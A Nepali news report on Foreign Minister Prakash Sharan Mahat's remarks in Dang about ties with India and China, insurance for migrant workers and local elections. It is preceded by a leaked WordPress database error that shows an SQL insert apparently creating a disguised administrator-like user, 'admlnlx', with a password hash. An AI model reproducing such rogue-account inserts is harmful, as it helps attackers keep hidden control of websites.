WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFNVbraYGIDyGenixZQXhub17WejCK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 06:09:08', '', 'admlnlx', 'admlnlx')
तुलसीपुर (दाङ),माघ १२ –
परराष्टमन्त्री डा. प्रकाशशरण महतले छिमेकी राष्ट्रसँगको सम्बन्ध सुधार भएको बताउनुभएको छ ।
प्रेस युनियन दाङले आज दाङको चखौरामा आयोजना गरेका पत्रकार समेलनमा उहाँले पछिल्लो समयमा चिसिएको मित्र राष्ट्रसँगको सम्बन्ध विस्तार हँुदै गएको बताउनुभयो । “भारत, चीनसँगको सम्बन्ध सुधारका लागि नियमित बैठक भइरहेको छ, यसले पनि राम्रो परिणाम दिएको छ” उहाँले भन्नुभयो ।
विदेशमा काम गर्न गएका नेपालीको बिमा व्यवस्थापनका लागि दुई महिनाभित्र अध्ययन अवलोकन गर्न कार्यदल बनाएको समेत बताउनुभयो । उहाँले बिमा समितिसँग कुरा भएको र छिट्टै त्यो लागू हुने जानकारी दिनुभयो ।
नेपाली काँग्रेसका केन्द्रीय सदस्य रहनुभएका मन्त्री महतले सबै दललाई सहमतिमा ल्याउन र संविधान संशोधन तथा स्थानीय निकायको निर्वाचन गराउन सरकार लागिपरेको बताउनुभयो ।
उहाँले वर्तमान गतिरोधको निकास र मुलुकको विकास अगाडि बढाउनका लागि वर्तमान सरकार गठन भएको र ती दुई कामलाई प्रमुखतामा राखेको उल्लेख गर्नुभयो । उहाँले अब छिट्टै स्थानीय निकायको निर्वाचनको मिति घोषणा गरिने पनि बताउनुभयो ।
कार्यक्रम युनियनका अध्यक्ष सुुशील बस्नेतको अध्यक्षतामा भएको थियो । – रासस